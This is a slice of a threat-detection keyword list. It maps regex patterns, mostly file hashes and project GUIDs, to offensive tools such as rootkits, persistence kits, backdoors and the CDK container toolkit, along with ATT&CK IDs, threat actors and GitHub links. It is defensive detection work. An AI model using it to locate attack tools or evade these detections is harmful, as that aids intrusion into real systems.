562*05B4EB7F-3D59-4E6A-A7BC-7C1241578CA7*.{0,1000}05B4EB7F\-3D59\-4E6A\-A7BC\-7C1241578CA7.{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit10#GUIDprojectN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z21069
563*0674724cfc3997eacbac08e11b5b416a818b1dab5c6be50861babdbf84c376ad*.{0,1000}0674724cfc3997eacbac08e11b5b416a818b1dab5c6be50861babdbf84c376ad.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21109
564*06a4364e32aacbd0d0385b51fd849a72cd52e99964610c6a108ab2ac07603342*.{0,1000}06a4364e32aacbd0d0385b51fd849a72cd52e99964610c6a108ab2ac07603342.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21122
565*06a53f84d7e034e563a8fc3747000bcdc6b9945efd0ecbc990322ff527b3ad04*.{0,1000}06a53f84d7e034e563a8fc3747000bcdc6b9945efd0ecbc990322ff527b3ad04.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21123
566*06AF1D64-F2FC-4767-8794-7313C7BB0A40*.{0,1000}06AF1D64\-F2FC\-4767\-8794\-7313C7BB0A40.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#GUIDprojectN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z21127
567*070ccb075d1dada74121d232e657a9aeda429014f44da57491aa92fc5a279924*.{0,1000}070ccb075d1dada74121d232e657a9aeda429014f44da57491aa92fc5a279924.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez10#filehashN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z21157
568*0790530e1e0f1ed73b2b6fd701d75a2409c785af5367304d5fdd5bdfdf7eae46*.{0,1000}0790530e1e0f1ed73b2b6fd701d75a2409c785af5367304d5fdd5bdfdf7eae46.{0,1000}offensive_tool_keywordSchTask_0x727create hidden scheduled tasksT1053TA0005 - TA0003N/AN/APersistencehttps://github.com/0x727/SchTask_0x72710#filehashN/A1065321122021-09-01T01:34:51Z2021-08-30T03:29:34Z21194
569*07c90800861a9cb41dd71f0af41af0ce1b174fccf71bf88abc6d82f0208b2d78*.{0,1000}07c90800861a9cb41dd71f0af41af0ce1b174fccf71bf88abc6d82f0208b2d78.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21210
570*07d53bb25aaa1b6ed1de40f0b8999be20a399172e49876cac3600503793df581*.{0,1000}07d53bb25aaa1b6ed1de40f0b8999be20a399172e49876cac3600503793df581.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21214
571*080b84e655682e3b4cd130b009a6c838a4c96ea147796cf216ffe3ebbaa256b1*.{0,1000}080b84e655682e3b4cd130b009a6c838a4c96ea147796cf216ffe3ebbaa256b1.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21235
572*0857d4485dee17166c1754eb699e8e8e720bff825717e5a23531cd4b8a3c30c1*.{0,1000}0857d4485dee17166c1754eb699e8e8e720bff825717e5a23531cd4b8a3c30c1.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21263
573*09323E4D-BE0F-452A-9CA8-B07D2CFA9804*.{0,1000}09323E4D\-BE0F\-452A\-9CA8\-B07D2CFA9804.{0,1000}offensive_tool_keywordCOM-HunterCOM-hunter is a COM Hijacking persistnce tool written in C#T1122 - T1055.012TA0003 - TA0005N/AN/APersistencehttps://github.com/nickvourd/COM-Hunter10#GUIDprojectN/A103289482025-03-11T04:49:55Z2022-05-26T19:34:59Z21323
574*0956efa9072a03fddbe779da42e60df115e9d71bf9ac846ade8b751e4530b084*.{0,1000}0956efa9072a03fddbe779da42e60df115e9d71bf9ac846ade8b751e4530b084.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21334
575*0976936c3c02be348ea926ce86c7204c7e9e59a092477e924c1a1d5bd97cfced*.{0,1000}0976936c3c02be348ea926ce86c7204c7e9e59a092477e924c1a1d5bd97cfced.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21346
576*0b199cc96ae7a68fcd8236cd2f995347c02e8a3ac7311584f6ed87b3dd50cf65*.{0,1000}0b199cc96ae7a68fcd8236cd2f995347c02e8a3ac7311584f6ed87b3dd50cf65.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21448
577*0b8feec02a5f7915868a1ecf83aa101aa1627d9d41fa27a95352ee3f20f79508*.{0,1000}0b8feec02a5f7915868a1ecf83aa101aa1627d9d41fa27a95352ee3f20f79508.{0,1000}offensive_tool_keywordScheduleRunnerA C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operationT1210 - T1570 - T1021 - T1550TA0008N/AN/APersistencehttps://github.com/netero1010/ScheduleRunner10#filehashN/A94336462025-01-22T02:06:59Z2021-10-12T15:27:32Z21480
578*0bb79f2fe4c5f6d451822a26cff27b172270bce29d7430e01bebe904cde0c215*.{0,1000}0bb79f2fe4c5f6d451822a26cff27b172270bce29d7430e01bebe904cde0c215.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21491
579*0byt3m1n1-V2*.{0,1000}0byt3m1n1\-V2.{0,1000}offensive_tool_keywordOWASP rulesOWASP repo of rules - extracted strings for detectionT1100 - T1505.003 - T1059.001TA0003N/AN/APersistencehttps://github.com/coreruleset/coreruleset/10N/Aphp title webshell71025364032025-04-22T10:55:49Z2020-05-13T11:28:52Z21512
580*0C117EE5-2A21-496D-AF31-8CC7F0CAAA86*.{0,1000}0C117EE5\-2A21\-496D\-AF31\-8CC7F0CAAA86.{0,1000}offensive_tool_keywordUnstoppableServicea Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interfaceT1543.003 - T1564.001 - T1490TA0003 - TA0005N/AN/APersistencehttps://github.com/malcomvetter/UnstoppableService10#GUIDProjectN/A5166152019-01-19T22:38:18Z2018-08-07T22:11:22Z21514
581*0c9a9c3ce08d379b81646f92d8cb90fbd3fb384e497a4388f4bc33f1c4c41a44*.{0,1000}0c9a9c3ce08d379b81646f92d8cb90fbd3fb384e497a4388f4bc33f1c4c41a44.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21559
582*0dc31dff0221a2907f19a6feff091161297598b7fab68a0272f7ce0d7698abff*.{0,1000}0dc31dff0221a2907f19a6feff091161297598b7fab68a0272f7ce0d7698abff.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21656
583*0dcb0ef0bd6b1a018108265c2bd1acf0a34ac94f2fe012a3aea22a23b8a151c2*.{0,1000}0dcb0ef0bd6b1a018108265c2bd1acf0a34ac94f2fe012a3aea22a23b8a151c2.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21657
584*0dece401c686c54a06aba232c7bf4f80b49e4087aed13078c4721676341db992*.{0,1000}0dece401c686c54a06aba232c7bf4f80b49e4087aed13078c4721676341db992.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10#filehashN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z21667
585*0dedf25f9bae707cb1cd5fc106f4516dc0ce7d8bf2114b50afeb6d2fbe506466*.{0,1000}0dedf25f9bae707cb1cd5fc106f4516dc0ce7d8bf2114b50afeb6d2fbe506466.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21668
586*0e17084a14b6af8e50ae4917261546121279fd94299bea1f5fcaa77f18a0feaf*.{0,1000}0e17084a14b6af8e50ae4917261546121279fd94299bea1f5fcaa77f18a0feaf.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21682
587*0e411f4a58f7ca4e77a39c810bd1cb44eca9f8cbae2a20d1c3ed6d3f1b9c4f81*.{0,1000}0e411f4a58f7ca4e77a39c810bd1cb44eca9f8cbae2a20d1c3ed6d3f1b9c4f81.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21695
588*0e8ad3e18880129b9042c97c891691f1437dd648a58480e0d4448a98718edbbf*.{0,1000}0e8ad3e18880129b9042c97c891691f1437dd648a58480e0d4448a98718edbbf.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21715
589*0f45809e1a640a7f54dd5211aff1b5239c310b0e81ddfb1244345ce6ec9d72e2*.{0,1000}0f45809e1a640a7f54dd5211aff1b5239c310b0e81ddfb1244345ce6ec9d72e2.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21763
590*0fa3195520e1b55fa7d36818a916b9b8cee1ee673997ec71c18a52947697d2fb*.{0,1000}0fa3195520e1b55fa7d36818a916b9b8cee1ee673997ec71c18a52947697d2fb.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10#filehashN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z21796
591*0x727/SchTask_0x727*.{0,1000}0x727\/SchTask_0x727.{0,1000}offensive_tool_keywordSchTask_0x727create hidden scheduled tasksT1053TA0005 - TA0003N/AN/APersistencehttps://github.com/0x727/SchTask_0x72711N/AN/A1065321122021-09-01T01:34:51Z2021-08-30T03:29:34Z21837
592*0xthirteen/SharpStay*.{0,1000}0xthirteen\/SharpStay.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay11N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z21861
593*0xthirteen/StayKit*.{0,1000}0xthirteen\/StayKit.{0,1000}offensive_tool_keywordcobaltstrikeStayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040N/AAPT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - SandwormPersistencehttps://github.com/0xthirteen/StayKit11N/AN/AN/A10475732020-01-27T14:53:31Z2020-01-24T22:20:20Z21862
594*'1. Set the backdoor'*.{0,1000}\'1\.\sSet\sthe\sbackdoor\'.{0,1000}offensive_tool_keywordlogon_backdoorautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/szymon1118/logon_backdoor10N/AN/A611042016-02-12T11:42:59Z2016-02-10T22:38:46Z21868
595*107EBC1B-0273-4B3D-B676-DE64B7F52B33*.{0,1000}107EBC1B\-0273\-4B3D\-B676\-DE64B7F52B33.{0,1000}offensive_tool_keywordSharpPersistSDA Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machinesT1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/cybersectroll/SharpPersistSD10#GUIDprojectN/A10187122024-05-15T14:55:14Z2024-05-13T15:11:12Z21897
596*11ae0608b6218b088dc3880ab366c93247bc33665a8a7f14b9da4d450e449dfe*.{0,1000}11ae0608b6218b088dc3880ab366c93247bc33665a8a7f14b9da4d450e449dfe.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z21983
597*131c1f2e3e3062392bece1caca144ef426920af8c8a54912f8ec23321a766b5a*.{0,1000}131c1f2e3e3062392bece1caca144ef426920af8c8a54912f8ec23321a766b5a.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22109
598*1392c9ae26021890c4fe0a3a960426da99e504d587b971408f40997d56e1ee63*.{0,1000}1392c9ae26021890c4fe0a3a960426da99e504d587b971408f40997d56e1ee63.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22143
599*139c41629e75329a9582b0a3ca07327a134860d4cc3686795a5fb69d09ee50aa*.{0,1000}139c41629e75329a9582b0a3ca07327a134860d4cc3686795a5fb69d09ee50aa.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22145
600*13e50600945f06df6bbbf28c06f76ad655acfbd866cdac2845fc48be282b7e6a*.{0,1000}13e50600945f06df6bbbf28c06f76ad655acfbd866cdac2845fc48be282b7e6a.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22167
601*13f42e004a25be9ba99aee3396a1d810026d7750d1e199774c5ba8410b15ae30*.{0,1000}13f42e004a25be9ba99aee3396a1d810026d7750d1e199774c5ba8410b15ae30.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22171
602*14083A04-DD4B-4E7D-A16E-86947D3D6D74*.{0,1000}14083A04\-DD4B\-4E7D\-A16E\-86947D3D6D74.{0,1000}offensive_tool_keywordXrulezXRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.T1078 - T1105 - T1059 - T1566TA0002 - TA0003 - TA0005 - TA0011N/AN/APersistencehttps://github.com/FSecureLABS/Xrulez10#GUIDprojectN/A102162452018-12-11T16:33:08Z2016-08-31T10:10:10Z22174
603*1416d3d651adeb29acbc825d7d537a379fdcb78102c36842a876dcf29e76c0e8*.{0,1000}1416d3d651adeb29acbc825d7d537a379fdcb78102c36842a876dcf29e76c0e8.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22178
604*14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a*.{0,1000}14e2f70470396a18c27debb419a4f4063c2ad5b6976f429d47f55e31066a5e6a.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10#filehashN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z22230
605*1502b9bb17fe2a278c56ecfc1f3eb0cde62b083a260eda1ffe2423797962807d*.{0,1000}1502b9bb17fe2a278c56ecfc1f3eb0cde62b083a260eda1ffe2423797962807d.{0,1000}offensive_tool_keywordCreateServiceCreating a persistent serviceT1543.003 - T1547.001 - T1050TA0003N/AN/APersistencehttps://github.com/uknowsec/CreateService10#filehashN/A42105272021-04-26T06:43:12Z2020-09-23T05:03:52Z22239
606*156a20924b696b89e6df463edce6afe72bc8348af0c52c399ff5d88e3a9d6e5a*.{0,1000}156a20924b696b89e6df463edce6afe72bc8348af0c52c399ff5d88e3a9d6e5a.{0,1000}offensive_tool_keywordPoshADCSattack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)T1213.003 - T1213 - T1098.003 - T1098 - T1484.001TA0002 - TA0003 - TA0040N/AN/APersistencehttps://github.com/cfalta/PoshADCS10#filehashN/A72186172021-07-07T16:47:07Z2019-10-15T15:54:03Z22258
607*1647b6e9073cee9751e3cd9a031656a6b830355a7a87d15cdc18601ddfa2f327*.{0,1000}1647b6e9073cee9751e3cd9a031656a6b830355a7a87d15cdc18601ddfa2f327.{0,1000}offensive_tool_keywordtsh-goTiny SHell Go - An open-source backdoor written in GoT1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009TA0003 - TA0005 - TA0011 - TA0010N/AN/APersistencehttps://github.com/CykuTW/tsh-go10#filehashN/A102161162024-08-29T02:59:37Z2022-06-13T16:25:30Z22324
608*16edb60cec97590d754e99e2eb719bbc990d71dcf1bda7c8eebf3b517574846d*.{0,1000}16edb60cec97590d754e99e2eb719bbc990d71dcf1bda7c8eebf3b517574846d.{0,1000}offensive_tool_keywordWSAAcceptBackdoorWinsock accept() Backdoor ImplantT1574.001 - T1059 - T1213 - T1105 - T1546TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/EgeBalci/WSAAcceptBackdoor10#filehashN/A102112232021-02-13T19:18:41Z2021-02-13T15:59:01Z22365
609*1731851bbacba1bb0339f252f84a8f170532eb6f82e024e25071ef889e24d936*.{0,1000}1731851bbacba1bb0339f252f84a8f170532eb6f82e024e25071ef889e24d936.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22381
610*17b096ff5df1b612abc12887e65fae97280533bfe058ce6becb9c0920f4d4c42*.{0,1000}17b096ff5df1b612abc12887e65fae97280533bfe058ce6becb9c0920f4d4c42.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22414
611*18c3accc4f65aae7bf7897adef35abdcca3697884860a6b5360e4f2d07bc26ed*.{0,1000}18c3accc4f65aae7bf7897adef35abdcca3697884860a6b5360e4f2d07bc26ed.{0,1000}offensive_tool_keywordTermiteTermite rootit abused by threat actorsT1014 - T1069 - T1055TA0005 - TA0003 - TA0004Operation TunnelSnakeWhiteflyPersistencehttps://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a410#filehashN/A10101561772021-01-26T23:16:49Z2019-01-03T05:01:20Z22479
612*197c42343c75fbbb7d77f3aaa92e04e43ddec927887e889197db72fcff5e9df4*.{0,1000}197c42343c75fbbb7d77f3aaa92e04e43ddec927887e889197db72fcff5e9df4.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22533
613*1a338c455c8cf9b8499c16e26cfa7e4b34109cf441045a6d006a8d9aa8d852bb*.{0,1000}1a338c455c8cf9b8499c16e26cfa7e4b34109cf441045a6d006a8d9aa8d852bb.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10#filehashN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z22583
614*1acd7ea1364e9c78d271cc8341ae804e8a6e143d4c31103d6dd5424dbc80498a*.{0,1000}1acd7ea1364e9c78d271cc8341ae804e8a6e143d4c31103d6dd5424dbc80498a.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22631
615*1b2c21dd0c747782c5b23b0ca390a23a17cb3fe437021c5f44e5d77d6b71f656*.{0,1000}1b2c21dd0c747782c5b23b0ca390a23a17cb3fe437021c5f44e5d77d6b71f656.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z22663
616*1BA54A13-B390-47B3-9628-B58A2BBA193B*.{0,1000}1BA54A13\-B390\-47B3\-9628\-B58A2BBA193B.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#GUIDprojectN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z22703
617*1bc73a13029b5677f070a991cec0ed90f3ebd70bcc0566a4724496eb71792dee*.{0,1000}1bc73a13029b5677f070a991cec0ed90f3ebd70bcc0566a4724496eb71792dee.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10#filehashN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z22709
